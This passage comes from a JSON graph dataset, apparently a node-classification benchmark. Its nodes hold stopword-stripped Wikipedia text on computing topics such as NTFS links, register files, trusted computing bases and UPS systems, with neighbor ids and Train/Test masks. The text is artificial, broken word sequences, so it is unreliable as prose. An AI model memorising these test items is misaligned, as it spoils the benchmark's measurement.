used target contents even referenced container directory junctions soft links persist even target directory removed working limited form symbolic links additional restriction location target optimized version allowing faster processing reparse point implemented less overhead newer ntfs symbolic links resolved server side found remote shared directories symbolic links soft links introduced windows vista symbolic links resolved client side symbolic link shared target subject access restrictions client server symbolic links created either files created codice_20 directories created codice_21 unlike unix symbolic links semantic link must provided created link target however need exist available symbolic link created symbolic link accessed target checked availability ntfs also check correct type file directory return not-found error existing target wrong type also reference shared directories remote hosts files subdirectories within shared directories target mounted immediately boot temporarily demand opening openfile createfile api definition persistent ntfs volume created types symbolic links removed files using codice_22 command line prompt batch distributed link tracking allows applications track files shell shortcuts ole links even renamed moved another volume within machine domain workgroup tracking implemented system service uses object identifier oid index stored metafile application requests track file directory tracking service creates oid entry points file file rename copy move operation ntfs v3 volume also copies object id allows tracking service eventually find target file several directories different similar files files may identical content single instance storage allows identical files merged one file create references merged file sis consists file system filter manages copies modification merges files user space service groveler searches files identical need merging sis mainly designed remote installation servers may multiple installation images contain many identical files sis allows consolidated unlike example hard links file remains distinct changes one copy file leave others unaltered similar copy-on-write technique memory copying really done one copy modified hierarchical storage management means transferring files used period time less expensive storage media file next accessed reparse point file determines needed retrieves storage nss activex document storage technology since discontinued microsoft allowed activex documents stored multi-stream format activex uses internally nss file system filter loaded used process multiple streams transparently application file transferred non-ntfs formatted disk volume would also transfer multiple streams single stream windows 10 build 17063 stable release version 1803 microsoft introduced unix domain sockets windows realized using afunix.sys kernel driver new reparse point filesystem unix domain sockets common bsd linux systems since ages seen standard inter process communication systems therefore introduction windows allow simplified adoption code cross platform portability stuxnet part series win32 exploits uses ntfs junction points part overall mode operation",
    "neighbors": [
      5120,
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3843,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      5969,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      5492,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 3171,
    "label": 8,
    "text": "List_of_SPARQL_implementations:list sparql implementations list shows notable triplestore apis storages implemented w3c sparql standard",
    "neighbors": [
      5632,
      8451,
      10340,
      6629,
      6470,
      11098,
      4255
    ],
    "mask": "None"
  },
  {
    "node_id": 3172,
    "label": 4,
    "text": "Dan_Farmer:dan farmer dan farmer born april 5 1962 american computer security researcher programmer pioneer development vulnerability scanners unix operating systems computer networks farmer developed first software suite computer science student purdue university 1989 gene spafford one professors helped start project software called computer oracle password system cops comprises several small specialized vulnerability scanners designed identify security weaknesses one part unix operating system 1995 farmer wietse venema dutch programmer physicist developed second vulnerability scanner called security administrator tool analyzing networks satan published satan network administrators law enforcement personnel believed hackers would use identify break vulnerable computers consequently sgi terminated farmer employment within years use vulnerability scanners satan became accepted method auditing computer network security codeveloped titan vulnerability scanner brad powell matt archibald presented large installation system administration conference lisa 1998 farmer venema collaborated develop computer forensics suite called coroner toolkit later coauthored forensic discovery 2005 book computer forensics farmer co-founded elemental security dayne myers served corporation chief technical officer",
    "neighbors": [
      3937,
      10051,
      2084,
      9319,
      3503,
      7983,
      5492,
      7605,
      8469,
      8791,
      2747,
      4956,
      413,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3173,
    "label": 6,
    "text": "Hi_Performance_FileSystem:hi performance filesystem hi performance filesystem hfs file system used hp-ux operating system variant unix file system",
    "neighbors": [
      1304,
      1801,
      9762,
      11184
    ],
    "mask": "Train"
  },
  {
    "node_id": 3174,
    "label": 8,
    "text": "Adtech_(company):adtech company adtech ag german–american digital marketing company retails products manage serve evaluate online advertising campaigns including display video mobile formats company founded 1998 frankfurt germany acquired web portal aol may 15 2007 company merged oath inc. brand subsidiary verizon communications adtech founded 1998 frankfurt germany michael stusch michael schultheiß 2000 american internet holding company cmgi acquired controlling interest 80 adtech year adtech became private limited company based adforce inc. ’ technology adtech opened first data center frankfurt germany 1998 2001 adtech delivered ten billionth banner ad 2002 adtech supplied 100,000th advertising campaign delivered 100 million banners every day 2004 adforce technology replaced adtech ’ ad serving technology shortly second ad serving data center launched frankfurt may 16 2007 aol announced acquisition adtech ag adtech acquired provide aol ad serving platform enabling website publishers manage traffic report online advertising campaigns operating independent wholly owned subsidiary aol advertising.com division ad-serving platform aol advertising previously platform-a company november 2018 part oath inc. owned verizon communications adtech provides integrated ad serving platform product allows publishers advertisers agencies ad networks ability manage display video mobile digital advertising campaigns adtech ad server responds banner requests prompted user ’ browsers xml delivers specified end system — provision terminals must online open design adtech adservers allows implementation external technologies targeting adtech collaborates vendors nugg wunderloop fall 2007 adtech presented integrated suite display video mobile ad serving technologies digital publishers ad tech london ad tech new york collaboration technology partners lightningcast third screen media adtech merged new video mobile applications directly existing user interface reporting system according adtech digital advertisements distributed mobile devices type including mobile smart phones customers also able apply selective targeting options address advertiser needs since 2004 adtech interprets banner requests ad servers periodical web analyses europe adtech surveys document different aspects internet usage ranging browser trends click-through rates also serve reference professional articles trends digital marketing industry",
    "neighbors": [
      488,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 3175,
    "label": 3,
    "text": "Register_file:register file register file array processor registers central processing unit cpu modern integrated circuit-based register files usually implemented way fast static rams multiple ports rams distinguished dedicated read write ports whereas ordinary multiported srams usually read write ports instruction set architecture cpu almost always define set registers used stage data memory functional units chip simpler cpus architectural registers correspond one-for-one entries physical register file prf within cpu complicated cpus use register renaming mapping physical entry stores particular architectural register changes dynamically execution register file part architecture visible programmer opposed concept transparent caches register files may clubbed together register banks processors several register banks arm processors use arm register banks fast interrupt request x86 processors use context switching fast interrupt switching instruction decoder gprs register files one instruction issued existing processors support superscalar however context switching totally different mechanism arm register bank within registers modcomp later 8051-compatible processors use bits program status word select currently active register bank usual layout convention simple array read vertically single word line runs horizontally causes row bit cells put data bit lines run vertically sense amps convert low-swing read bitlines full-swing logic levels usually bottom convention larger register files sometimes constructed tiling mirrored rotated simple arrays register files one word line per entry per port one bit line per bit width per read port two bit lines per bit width per write port bit cell also vdd vss therefore wire pitch area increases square number ports transistor area increases linearly point may smaller and/or faster multiple redundant register files smaller numbers read ports rather single register file read ports mips r8000 integer unit example 9 read 4 write port 32 entry 64-bit register file implemented 0.7 µm process could seen looking chip arm length two popular approaches dividing registers multiple register files distributed register file configuration partitioned register file configuration principle operation could done 64-bit-wide register file many read write ports could done single 8-bit-wide register file single read port single write port however bit-level parallelism wide register files many ports allows run much faster thus operations single cycle would take many cycles fewer ports narrower bit width width bits register file usually number bits processor word size occasionally slightly wider order attach extra bits register poison bit width data word different width address—or cases 68000 even width—the address registers separate register file data registers basic scheme bit cell many optimizations possible register files make special provision prevent multiple write ports writing entry simultaneously instead instruction scheduling hardware ensures one instruction particular cycle writes particular entry multiple instructions targeting register issued one write enables turned crossed inverters take finite time settle write operation read operation either take longer return garbage common bypass multiplexers bypass written data read ports simultaneous read write entry commanded bypass multiplexers often part larger bypass network forwards results yet committed functional units register file usually pitch-matched datapath serves pitch matching avoids many busses passing datapath turn corners would use lot area since every unit must bit pitch every unit datapath ends bit pitch forced widest unit waste area units register files two wires per bit per write port bit lines must contact silicon every bit cell often set pitch datapath area sometimes saved machines multiple units datapath two datapaths side-by-side smaller bit pitch single datapath would case usually forces multiple copies register file one datapath alpha 21264 ev6 instance first large micro-architecture implement shadow register file architecture two copies integer register file two copies floating point register locate front end future scaled file contain 2 read 2 write port took extra cycle propagate data two context switch issue logic attempted reduce number operations forwarding data two greatly improved integer performance help reduce impact limited number gpr superscalar speculative execution design later adapted sparc mips later x86 implementation mips uses multiple register file well r8000 floating-point unit two copies floating-point register file four write four read ports wrote copies time context switch however support integer operation integer register file still remain one later shadow register file abandoned newer design favor embedded market sparc uses shadow register file architecture well high end line 4 copies integer register files future retired scaled scratched contain 7 read 4 write port 2 copies floating point register file unlike alpha x86 locate back end retire unit right order unit renaming register files load instruction instruction fetch decoding stage context switch needless design ibm uses mechanism many major microprocessors deeply merging register file decoder register file work independently decoder side involve context switch different alpha x86 register file serve dedicate decoder thread level example power8 8 instruction decoders 32 register files 32 general purpose registers 4 read 4 write port facilitate simultaneous multithreading instruction used cross register file lack context switch. x86 processor line typical pre-486 cpu individual register file general purpose register directly work decoder x87 push stack located within floating-point unit starting pentium typical pentium-compatible x86 processor integrated one copy single-port architectural register file containing 8 architectural registers 8 control registers 8 debug registers 8 condition code registers 8 unnamed based register one instruction pointer one flag register 6 segment registers one file one copy 8 x87 fp push stack default mmx register virtually simulated x87 stack require x86 register supplying mmx instruction aliases exist stack p6 instruction independently stored executed parallel early pipeline stages decoding micro-operations renaming out-of-order execution beginning p6 register files require additional cycle propagate data register files like architectural floating point located code buffer decoders called retire buffer reorder buffer oooe connected within ring bus 16 bytes register file still remains one x86 register file one x87 stack serve retirement storing x86 register file increased dual ported increase bandwidth result storage registers like debug/condition code/control/unnamed/flag stripped main register file placed individual files micro-op rom instruction sequencer inaccessible registers like segment register separated general-purpose register file except instruction pointer located scheduler instruction allocator order facilitate register renaming out-of-order execution x87 stack later merged floating-point register file 128-bit xmm register debuted pentium iii xmm register file still located separately x86 integer register files later p6 implementations pentium yonah introduced shadow register file architecture expanded 2 copies dual ported integer architectural register file consist context switch future retirered file scaled file using trick used integer floating point order solve register bottleneck exist x86 architecture micro op fusion introduced still 8 entries 32 bit architectural registers total 32 bytes capacity per file segment register instruction pointer remain within file though inaccessible program speculative file second file served scaled shadow register file without context switch scaled file store instruction independently instruction sse2/sse3/ssse3 require feature integer operation example instruction like pshufb pmaddubsw phsubw phsubd phsubsw phaddw phaddd phaddsw would require loading eax/ebx/ecx/edx register file though uncommon x86 processor take use another register file instruction time second file served scale retirered file pentium architecture still remains one dual-ported fp register file 8 entries mm/xmm shared three decoder fp register shadow register file shadow register file architecture including floating point function processor p6 architectural register file external locate processor backend retired opposite internal register file locate inner core register renaming/reorder buffer however core 2 within unit called register alias table rat located instruction allocator size register size retirement core 2 increased inner ring bus 24 bytes allow 3 instructions decoded extended register file dual ported one read/one write quad ported two read/two write register still remain 8 entries 32 bit 32 bytes including 6 segment register one instruction pointer unable access file code/instruction total file size expanded 16 entries x64 total 128 bytes size per file pentium pipeline port decoder increased 're located allocator table instead code buffer fp xmm register file also increase quad ported 2 read/2 write register still remain 8 entries 32 bit extended 16 entries x64 mode number still remain 1 shadow register file architecture including floating point/sse functions later x86 implementations like nehalem later processors integer floating point registers incorporated unified octa-ported six read two write general-purpose register file 8 8 32-bit 16 16 x64 per file register file extended 2 enhanced shadow register file architecture favorite executing hyper threading thread uses independent register files decoder later sandy bridge onward replaced shadow register table architectural registers much large yet advance physical register file decoding reorder buffer randered sandy bridge onward longer carry architectural register atom line modern simplified revision p5 includes single copies register file share thread decoder register file dual-port design 8/16 entries gprs 8/16 entries debug register 8/16 entries condition code integrated file however eight-entries 64 bit shadow based register eight-entries 64 bit unnamed register separated main gprs unlike original p5 design located execution unit file registers single-ported expose instruction like scaled shadow register file found core/core2 shadow register file made architectural registers bonnell due shadow register file architecture however file use renaming purpose due lack order execution found bonnell architecture also one copy xmm floating point register file per thread difference nehalem bonnell unified register file dedicated register file hyper threading instead bonnell uses separate rename register thread despite order similar bonnell larrabee xeon phi also one general-purpose integer register file larrabee 16 xmm register files 8 entries per file xeon phi 128 avx-512 register files containing 32 512-bit zmm registers vector instruction storage big l2 cache intel x86 lines n't register file internal design geode gx vortex86 many embedded processors n't pentium-compatible reverse-engineered early 80x86 processors therefore n't register file decoders gprs used individually pentium 4 hand register file decoder x86 gprs n't exist within structure due introduction physical unified renaming register file similar sandy bridge slightly different due inability pentium 4 use register naming attempting replace architectural register file skip x86 decoding scheme instead uses sse integer execution storage alu result sse2/sse3/ssse3 use mechanism well integer operation amd early design like k6 register file like intel support shadow register file architecture lack context switch bypass inverter necessary require register file function appropriately instead use separate gprs directly link rename register table oooe cpu dedicated integer decoder floating decoder mechanism similar intel pre-pentium processor line example k6 processor four int one eight-entries temporary scratched register file one eight-entries future register file one eight-entries fetched register file eight-entries unnamed register file two fp rename register files two eight-entries x87 st file one goes fadd one goes fmov directly link x86 eax integer renaming xmm0 register floating point renaming later athlon included shadow register front end scaled 40 entries unified register file order integer operation decoded register file contain 8 entries scratch register 16 future gprs register file 16 unnamed gprs register file later amd designs abandons shadow register design favored k6 architecture individual gprs direct link design like phenom three int register files two sse register files located physical register file directly linked gprs however scales one integer one floating-point bulldozer like early amd designs x86 manufacturers like cyrix via dm p sis used mechanism well resulting lack integer performance without register renaming in-order cpu companies like cyrix amd increase cache size hope reduce bottleneck amd sse integer operation work different way core 2 pentium 4 uses separate renaming integer register load value directly decode stage though theoretically need shorter pipeline intel sse implementation generally cost branch prediction much greater higher missing rate intel would take least two cycles sse instruction executed regardless instruction wide early amds implementations could execute fp int sse instruction set like intel implementation unlike alpha sparc mips allows one register file load/fetch one operand time would require multiple register files achieve superscale arm processor hand integrate multiple register files load/fetch instructions arm gprs special purpose instruction set arm isa require accumulator index stack/base points registers accumulator base/stack point used thumb mode gprs propagate store multiple instructions independently smaller code size small enough able fit one register architectural register act table shared decoder/instructions simple bank switching decoders major difference arm designs arm allows run general-purpose register quick bank switching without requiring additional register file superscalar despite x86 sharing mechanism arm gprs store data individually x86 confront data dependency three non-related instructions stored gprs per file small eight 32 bit mode 16 64 bit compared arm 13 32 bit 31 64 bit data impossible superscalar without multiple register files feed decoder x86 code big complex compared arm x86 front-ends become much larger much power hungry arm processor order competitive example pentium core 2 duo bay trail third-party x86 equivalent processors even became noncompetitive arm due dedicated register file architecture particularly amd cyrix via bring reasonable performance without register renaming order execution leave intel atom in-order x86 processor core mobile competition x86 nehalem processor merged integer floating point register one single file introduction large physical register table enhanced allocator table front-end renaming out-of-order internal core processors perform register renaming arrange functional unit write subset physical register file arrangement eliminate need multiple write ports per bit cell large savings area resulting register file effectively stack register files single write ports benefits replication subsetting read ports limit technique would place stack 1-write 2-read regfiles inputs functional unit since regfiles small number ports often dominated transistor area best push technique limit useful sparc isa defines register windows 5-bit architectural names registers actually point window much larger register file hundreds entries implementing multiported register files hundreds entries requires large area register window slides 16 registers moved architectural register name refer small number registers larger array e.g architectural register r20 refer physical registers 20 36 52 68 84 100 116 seven windows physical file save area sparc implementations implement 32-entry register file cell seven bits one read writeable external ports contents bits rotated rotation accomplishes single cycle movement register window wires accomplishing state movement local tremendous bandwidth possible little power technique used r10000 register renaming mapping file stores 6-bit virtual register number physical registers renaming file renaming state checkpointed whenever branch taken branch detected mispredicted old renaming state recovered single cycle see register renaming",
    "neighbors": [
      7173,
      6151,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      4172,
      2638,
      7770,
      1122,
      6247,
      6252,
      8815,
      6256,
      630,
      8822,
      6268,
      3197,
      7313,
      6804,
      6815,
      8352,
      5793,
      6818,
      6821,
      6311,
      682,
      7852,
      9391,
      2224,
      2226,
      7858,
      4276,
      9911,
      8890,
      4286,
      2241,
      2243,
      6339,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      5356,
      9964,
      5358,
      5871,
      1776,
      8944,
      757,
      2805,
      3317,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      3352,
      6936,
      7963,
      1309,
      2339,
      6950,
      3886,
      10548,
      309,
      8501,
      5948,
      8508,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      342,
      344,
      8543,
      1376,
      10603,
      8048,
      4465,
      10612,
      11636,
      1399,
      7033,
      1402,
      2432,
      3457,
      9095,
      398,
      3470,
      5518,
      8590,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      8125,
      4030,
      453,
      3014,
      466,
      10706,
      1499,
      1502,
      7134,
      5088,
      5090,
      995,
      7653,
      7142,
      6633,
      7657,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 3176,
    "label": 1,
    "text": "CLSQL:clsql clsql sql database interface common lisp created 2001 kevin m. rosenberg initially based substantially maisql package pierre r. mai orphaned onshore development marcus pearce ported uncommonsql package clsql provides commonsql-compatible api clsql clsql used query interface mysql postgresql odbc aodbc sqlite version 2 3 oracle oci",
    "neighbors": [
      4865,
      2438,
      9865,
      2062,
      9877,
      4122,
      1448,
      9128,
      5546,
      4779,
      10413,
      7983,
      8883,
      6969,
      6201,
      7867,
      8258,
      8771,
      4550,
      11083,
      8908,
      1613,
      9299,
      1365,
      2901,
      2392,
      7896,
      8539,
      6493,
      7267,
      2667,
      5612,
      7022,
      1146,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 3177,
    "label": 1,
    "text": "Trigger_list:trigger list trigger list general meaning refers list whose items used initiate trigger certain actions united states person applies mortgage loan lender makes credit inquiry potential borrower national credit bureaus equifax experian transunion unless borrower opted credit bureaus put applicants onto trigger list leads persons interested new loans lists sold numerous lenders united states soon application applicant starts receiving offers parts country trigger lists contain significant amount personal financial information among buyers trigger lists lead generators resell filtered information borrowers e.g. people live certain area certain credit score federal trade commission considers market trigger lists legal business many people organizations national association mortgage brokers consider serious breach privacy lobby putting practice regulatory controls american consumers may opt-out trigger lists calling 1-888-5-optout 1-888-567-8688 zangger committee nuclear suppliers group maintain lists items may contribute nuclear proliferation nuclear non-proliferation treaty forbids members export items non-treaty members items said trigger countries responsibilities npt hence name",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3178,
    "label": 4,
    "text": "Trusted_computing_base:trusted computing base trusted computing base tcb computer system set hardware firmware and/or software components critical security sense bugs vulnerabilities occurring inside tcb might jeopardize security properties entire system contrast parts computer system outside tcb must able misbehave way would leak privileges granted accordance security policy careful design implementation system trusted computing base paramount overall security modern operating systems strive reduce size tcb exhaustive examination code base means manual computer-assisted software audit program verification becomes feasible term trusted computing base goes back john rushby defined combination kernel trusted processes latter refers processes allowed violate system access-control rules classic paper authentication distributed systems theory practice lampson et al define tcb computer system simply definitions clear convenient neither theoretically exact intended e.g network server process unix-like operating system might fall victim security breach compromise important part system security yet part operating system tcb orange book another classic computer security literature reference therefore provides formal definition tcb computer system words trusted computing base tcb combination hardware software controls work together form trusted base enforce security policy orange book explains words given piece hardware software part tcb designed part mechanism provides security computer system operating systems typically consists kernel microkernel select set system utilities example setuid programs daemons unix systems programming languages security features designed java e tcb formed language runtime standard library pointed consequence orange book definition boundaries tcb depend closely upon specifics security policy fleshed network server example even though say web server serves multi-user application part operating system tcb responsibility performing access control users usurp identity privileges sense definitely part tcb larger computer system comprises unix server user browsers web application words breaching web server e.g buffer overflow may regarded compromise operating system proper certainly constitutes damaging exploit web application fundamental relativity boundary tcb exemplified concept 'target evaluation 'toe common criteria security process course common criteria security evaluation one first decisions must made boundary audit terms list system components come scrutiny systems n't trusted computing base part design provide security secure insofar security provided external means e.g computer sitting locked room without network connection may considered secure depending policy regardless software runs david j. farber et al put nowiki n /nowiki computer system integrity lower layers typically treated axiomatic higher layers far computer security concerned reasoning security properties computer system requires able make sound assumptions importantly however barring reason believe otherwise computer able everything general von neumann machine obviously includes operations would deemed contrary simplest security policies divulging email password kept secret however barring special provisions architecture system denying computer could programmed perform undesirable tasks special provisions aim preventing certain kinds actions executed essence constitute trusted computing base reason orange book still reference design secure operating systems characterizes various security assurance levels defines mainly terms structure security features tcb outlined aforementioned orange book software portions trusted computing base need protect tampering effect due von neumann architecture implemented virtually modern computers since machine code processed another kind data read overwritten program barring special memory management provisions subsequently treated part tcb specifically trusted computing base must least prevent software written many modern cpus protection memory hosts tcb achieved adding specialized piece hardware called memory management unit mmu programmable operating system allow deny access specific ranges system memory programs run course operating system also able disallow programming programs technique called supervisor mode compared crude approaches storing tcb rom equivalently using harvard architecture advantage allowing security-critical software upgraded field although allowing secure upgrades trusted computing base poses bootstrap problems stated trust trusted computing base required make progress ascertaining security computer system words trusted computing base “ trusted ” first foremost sense trusted necessarily trustworthy real-world operating systems routinely security-critical bugs discovered attests practical limits trust alternative formal software verification uses mathematical proof techniques show absence bugs researchers nicta spinout open kernel labs recently performed formal verification sel4 member l4 microkernel family proving functional correctness c implementation kernel makes sel4 first operating-system kernel closes gap trust trustworthiness assuming mathematical proof free error due aforementioned need apply costly techniques formal verification manual review size tcb immediate consequences economics tcb assurance process trustworthiness resulting product terms mathematical expectation number bugs found verification review order reduce costs security risks tcb therefore kept small possible key argument debate preferring microkernels monolithic kernels aix materializes trusted computing base optional component install-time package management system",
    "neighbors": [
      256,
      5636,
      5389,
      3473,
      7187,
      9884,
      1315,
      6950,
      5677,
      7983,
      2737,
      7483,
      10813,
      1474,
      8262,
      4423,
      8904,
      10835,
      9044,
      2399,
      225,
      4067,
      8302,
      5363,
      9845,
      7421,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3179,
    "label": 1,
    "text": "Tuvalu_Ship_Registry:tuvalu ship registry tuvalu ship registry body appointed government tuvalu register ships tuvalu flag ship registry launched 2004 located singapore operated tuvalu ship registry pte ltd ship registry managed behalf tuvalu government sovereign ventures sv pte ltd responsibilities registry include total 245 type bulk carrier 18 container ship 2 general cargo 36 oil tanker 27 162 2017 tuvalu entered international spotlight 2012 ships sailing flag iran registered tuvalu ship registry response european boycott iranian oil exports iran nuclear policy number oil tankers changed tuvalu flags according radio australia could lead unforeseen consequences small nation iranian vessels accepted tuvalu ship registry earlier flagged malta cyprus flags well-known reputable flags however upon understanding vessels actually sanctioned us eu government tuvalu took swift action instruct tuvalu ship registry de-register possible iranian-linked vessels 16 august 2012 iranian-linked vessels de-registered 21 september 2012 press releases actions taken tuvalu ship registry posted website iranian vessels later rumored gone flags tanzania mongolia others",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 3180,
    "label": 3,
    "text": "Operation_Europe:_Path_to_Victory:operation europe path victory operation europe path victory released japan combat strategy video game multiple platforms one two players compete world war ii action ms-dos version game released north america object game fulfill one military objectives either axis allied forces players engage modern warfare around western europe eastern europe central europe north africa game uses abstract numbers figures map view saves concrete illustrations soldiers lock horns battlefield urban setting urban settings give traditional 1930s view housing office buildings provide extra protection units guarding however massive numbers crunch lack graphics help enhance number crunching ability game artificial intelligence way utilize nobunaga ambition video game engine simulating modern warfare general statistics completely randomized roulette system 84 different characters used generals including american television show combat examples non-fictional characters include adolf hitler josef stalin walter bedell smith weapons automatically replenished end scenario units built scratch must requested head brigade instead japanese version game 4 game modes campaign demonstration one player game 2 players game campaign mode player play germans starting mode invasion france german army continues fighting africa ending berlin defense officers gain experience every scenario retaining winning battle troops often replaced type one infantry artillery howitzers reactive artillery tanks self-propelled artillery armored infantry carriers mechanized units often give stronger instead weaker make losses battalion strong units although campaign mode directly available us version game still present game text translated needed graphics present formulas calculating quantity quality units operate allows game patched enable campaign mode reviewing snes version gamepro applauded intelligent ai stating even n't friend go head-to-head game still enjoyable challenging huge amount content arguing six scenarios essentially amount six complete games single cart though noting lack action gameplay would make unappealing average gamer concluded challenging strategy makes game serious ww ii buff without",
    "neighbors": [
      9166,
      10999
    ],
    "mask": "Test"
  },
  {
    "node_id": 3181,
    "label": 4,
    "text": "Uninterruptible_power_supply:uninterruptible power supply uninterruptible power supply uninterruptible power source ups electrical apparatus provides emergency power load input power source mains power fails ups differs auxiliary emergency power system standby generator provide near-instantaneous protection input power interruptions supplying energy stored batteries supercapacitors flywheels on-battery run-time uninterruptible power sources relatively short minutes sufficient start standby power source properly shut protected equipment type continual power system ups typically used protect hardware computers data centers telecommunication equipment electrical equipment unexpected power disruption could cause injuries fatalities serious business disruption data loss ups units range size units designed protect single computer without video monitor around 200 volt-ampere rating large units powering entire data centers buildings world largest ups 46-megawatt battery electric storage system bess fairbanks alaska powers entire city nearby rural communities outages primary role ups provide short-term power input power source fails however ups units also capable varying degrees correcting common utility power problems manufacturers ups units categorize products accordance number power-related problems address three general categories modern ups systems on-line line-interactive standby ups one kilovolt-ampere 1 kva line-interactive standby variety usually less expensive large power units dynamic uninterruptible power supplies dups sometimes used synchronous motor/alternator connected mains via choke energy stored flywheel mains power fails eddy-current regulation maintains power load long flywheel energy exhausted dups sometimes combined integrated diesel generator turned brief delay forming diesel rotary uninterruptible power supply drups fuel cell ups developed recent years using hydrogen fuel cell power source potentially providing long run times small space offline/standby ups offers basic features providing surge protection battery backup protected equipment normally connected directly incoming utility power incoming voltage falls rises predetermined level sps turns internal dc-ac inverter circuitry powered internal storage battery ups mechanically switches connected equipment dc-ac inverter output switch-over time long 25 milliseconds depending amount time takes standby ups detect lost utility voltage ups designed power certain equipment personal computer without objectionable dip brownout device line-interactive ups similar operation standby ups addition multi-tap variable-voltage autotransformer special type transformer add subtract powered coils wire thereby increasing decreasing magnetic field output voltage transformer may also performed buck–boost transformer distinct autotransformer since former may wired provide galvanic isolation type ups able tolerate continuous undervoltage brownouts overvoltage surges without consuming limited reserve battery power instead compensates automatically selecting different power taps autotransformer depending design changing autotransformer tap cause brief output power disruption may cause upss equipped power-loss alarm chirp moment become popular even cheapest upss takes advantage components already included main 50/60 hz transformer used convert line voltage battery voltage needs provide two slightly different turns ratios one convert battery output voltage typically multiple 12 v line voltage second one convert line voltage slightly higher battery charging voltage multiple 14 v difference two voltages charging battery requires delta voltage 13–14 v charging 12 v battery furthermore easier switching line-voltage side transformer lower currents side gain buck/boost feature required two separate switches ac input connected one two primary taps load connected thus using main transformer primary windings autotransformer battery still charged bucking overvoltage boosting undervoltage transformer output low charge batteries autotransformers engineered cover wide range varying input voltages requires taps increases complexity expense ups common autotransformer cover range 90 v 140 v 120 v power switch battery voltage goes much higher lower range low-voltage conditions ups use current normal may need higher current circuit normal device example power 1000-w device 120 v ups draw 8.33 brownout occurs voltage drops 100 v ups draw 10 compensate also works reverse overvoltage condition ups need less current online ups batteries always connected inverter power transfer switches necessary power loss occurs rectifier simply drops circuit batteries keep power steady unchanged power restored rectifier resumes carrying load begins charging batteries though charging current may limited prevent high-power rectifier overheating batteries boiling electrolyte main advantage on-line ups ability provide electrical firewall incoming utility power sensitive electronic equipment online ups ideal environments electrical isolation necessary equipment sensitive power fluctuations although one time reserved large installations 10 kw advances technology permitted available common consumer device supplying 500 w less online ups may necessary power environment noisy utility power sags outages anomalies frequent protection sensitive equipment loads required operation extended-run backup generator necessary basic technology online ups standby line-interactive ups however typically costs much due much greater current ac-to-dc battery-charger/rectifier rectifier inverter designed run continuously improved cooling systems called double-conversion ups due rectifier directly driving inverter even powered normal ac current online ups typically static transfer switch sts increasing reliability hybrid rotary ups designs official designations although one name used utl double conversion demand style ups targeted towards high-efficiency applications still maintaining features protection level offered double conversion hybrid double conversion demand ups operates off-line/standby ups power conditions within certain preset window allows ups achieve high efficiency ratings power conditions fluctuate outside predefined windows ups switches online/double-conversion operation double-conversion mode ups adjust voltage variations without use battery power filter line noise control frequency ferroresonant units operate way standby ups unit however online exception ferroresonant transformer used filter output transformer designed hold energy long enough cover time switching line power battery power effectively eliminates transfer time many ferroresonant upss 82–88 efficient ac/dc-ac offer excellent isolation transformer three windings one ordinary mains power second rectified battery power third output ac power load dominant type ups limited around range units still mainly used industrial settings oil gas petrochemical chemical utility heavy industry markets due robust nature ups many ferroresonant upss utilizing controlled ferro technology may interact power-factor-correcting equipment result fluctuating output voltage ups may corrected reducing load levels adding linear type loads ups designed powering dc equipment similar online ups except need output inverter also ups battery voltage matched voltage device needs device power supply needed either since one power conversion steps eliminated increases efficiency run time many systems used telecommunications use extra-low voltage common battery 48 v dc power less restrictive safety regulations installed conduit junction boxes dc typically dominant power source telecommunications ac typically dominant source computers servers much experimentation 48 v dc power computer servers hope reducing likelihood failure cost equipment however supply amount power current would higher equivalent 115 v 230 v circuit greater current requires larger conductors energy lost heat laptop computer classic example pc dc ups built high voltage dc 380 v finding use data center applications allows small power conductors subject complex electrical code rules safe containment high voltages rotary ups uses inertia high-mass spinning flywheel flywheel energy storage provide short-term ride-through event power loss flywheel also acts buffer power spikes sags since short-term power events able appreciably affect rotational speed high-mass flywheel also one oldest designs predating vacuum tubes integrated circuits considered line since spins continuously normal conditions however unlike battery-based ups flywheel-based ups systems typically provide 10 20 seconds protection flywheel slowed power output stops traditionally used conjunction standby generators providing backup power brief period time engine needs start running stabilize output rotary ups generally reserved applications needing 10,000 w protection justify expense benefit advantages rotary ups systems bring larger flywheel multiple flywheels operating parallel increase reserve running time capacity flywheels mechanical power source necessary use electric motor generator intermediary diesel engine designed provide emergency power using transmission gearbox rotational inertia flywheel used directly start diesel engine running diesel engine used directly spin flywheel multiple flywheels likewise connected parallel mechanical countershafts without need separate motors generators flywheel normally designed provide high current output compared purely electronic ups better able provide inrush current inductive loads motor startup compressor loads well medical mri cath lab equipment also able tolerate short-circuit conditions 17 times larger electronic ups permitting one device blow fuse fail devices still continue powered rotary 